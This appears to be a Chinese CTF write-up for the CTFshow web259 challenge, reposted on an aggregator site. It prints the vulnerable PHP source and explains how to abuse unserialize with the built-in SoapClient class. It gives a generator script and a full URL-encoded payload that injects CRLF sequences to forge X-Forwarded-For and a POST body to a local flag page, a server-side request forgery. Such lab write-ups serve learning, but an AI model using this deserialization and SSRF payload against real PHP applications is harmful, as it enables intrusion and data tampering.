目錄

• 源碼
• 思路
• 題解
• 總結

---

源碼

<?phphighlight_file(__FILE__);$vip = unserialize($_GET['vip']); //vip can get flag one key $vip->getFlag();Notice: Undefined index: vip in /var/www/html/index.php on line 6Fatal error: Uncaught Error: Call to a member function getFlag() on bool in /var/www/html/index.php:8 Stack trace: #0 {main} thrown in /var/www/html/index.php on line 8

hint提示有個flag.php頁面

$xff = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); array_pop($xff); $ip = array_pop($xff);if($ip!=='127.0.0.1'){die('error'); }else{$token = $_POST['token'];if($token=='ctfshow'){file_put_contents('flag.txt',$flag);} }

---

思路

先看看index.php,考點是php原生類的一個反序列化，我們需要找一個php的內(nèi)置類
再看看flag.php,目的是在index.php通過反序列化一個原生類向flag.php發(fā)送請求，然后flag.php用file_put_contents把flag放到flag.txt里。發(fā)請求用的是php里的一個內(nèi)置類：SoapClient,這個類中有個__call魔術方法,當調(diào)用一個對象中不存在的方法時候，會執(zhí)行call()魔術方法。來達到我們偽造請求頭的目的。
參考文章： https://baijiahao.baidu.com/s?id=1709236552525677652&wfr=spider&for=pc

原生類 SoapClient

class SoapClient {/* Methods */public __construct(?string $wsdl, array $options = [])public __call(string $name, array $args): mixedpublic __doRequest(string $request,string $location,string $action,int $version,bool $oneWay = false): ?stringpublic __getCookies(): arraypublic __getFunctions(): ?arraypublic __getLastRequest(): ?stringpublic __getLastRequestHeaders(): ?stringpublic __getLastResponse(): ?stringpublic __getLastResponseHeaders(): ?stringpublic __getTypes(): ?arraypublic __setCookie(string $name, ?string $value = null): voidpublic __setLocation(?string $location = null): ?stringpublic __setSoapHeaders(SoapHeader|array|null $headers = null): boolpublic __soapCall(string $name,array $args,?array $options = null,SoapHeader|array|null $inputHeaders = null,array &$outputHeaders = null): mixed }

可以得知構造SoapClient的類對象的時候，需要有兩個參數(shù)，字符串$wsdl和數(shù)組$options

關于WSDL可以看下大佬的文章,這里值為NULL就好了

https://blog.csdn.net/yhahaha_/article/details/93716263

options傳入我們要構造的請求頭,uri和location必須要設置,我們可以本地構造一下,user_agent可以注入,要小寫

在flag.php中$_SERVER['HTTP_X_FORWARDED_FOR']要array_pop兩次,取第二次的值賦值給$IP,post傳入的token如果===ctfshow就會把$flag的值寫入flag.txt里面

<?php $ua = "kradress\r\nX-Forwarded-For: 127.0.0.1,127.0.0.1\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 13\r\n\r\ntoken=ctfshow"; $client = new SoapClient(null,array('uri' => 'http://127.0.0.1/' , 'location' => 'http://127.0.0.1/flag.php', 'user_agent' => $ua));echo(urlencode(serialize($client)));

補充幾個小細節(jié):

HTTP請求頭之間的參數(shù)用一個\r\n分隔 HTTP Header與HTTP Body是用兩個\r\n分隔的

這個是有關CRLF的知識點,可以看大佬博客:

https://wooyun.js.org/drops/CRLF%20Injection%E6%BC%8F%E6%B4%9E%E7%9A%84%E5%88%A9%E7%94%A8%E4%B8%8E%E5%AE%9E%E4%BE%8B%E5%88%86%E6%9E%90.html

題解

?vip=O%3A10%3A%22SoapClient%22%3A5%3A%7Bs%3A3%3A%22uri%22%3Bs%3A17%3A%22http%3A%2F%2F127.0.0.1%2F%22%3Bs%3A8%3A%22location%22%3Bs%3A25%3A%22http%3A%2F%2F127.0.0.1%2Fflag.php%22%3Bs%3A15%3A%22_stream_context%22%3Bi%3A0%3Bs%3A11%3A%22_user_agent%22%3Bs%3A132%3A%22kradress%0D%0AX-Forwarded-For%3A+127.0.0.1%2C127.0.0.1%0D%0AContent-Type%3A+application%2Fx-www-form-urlencoded%0D%0AContent-Length%3A+13%0D%0A%0D%0Atoken%3Dctfshow%22%3Bs%3A13%3A%22_soap_version%22%3Bi%3A1%3B%7D

---

總結

每天學一點

總結

以上是生活随笔為你收集整理的CTFshow 反序列化 web259的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。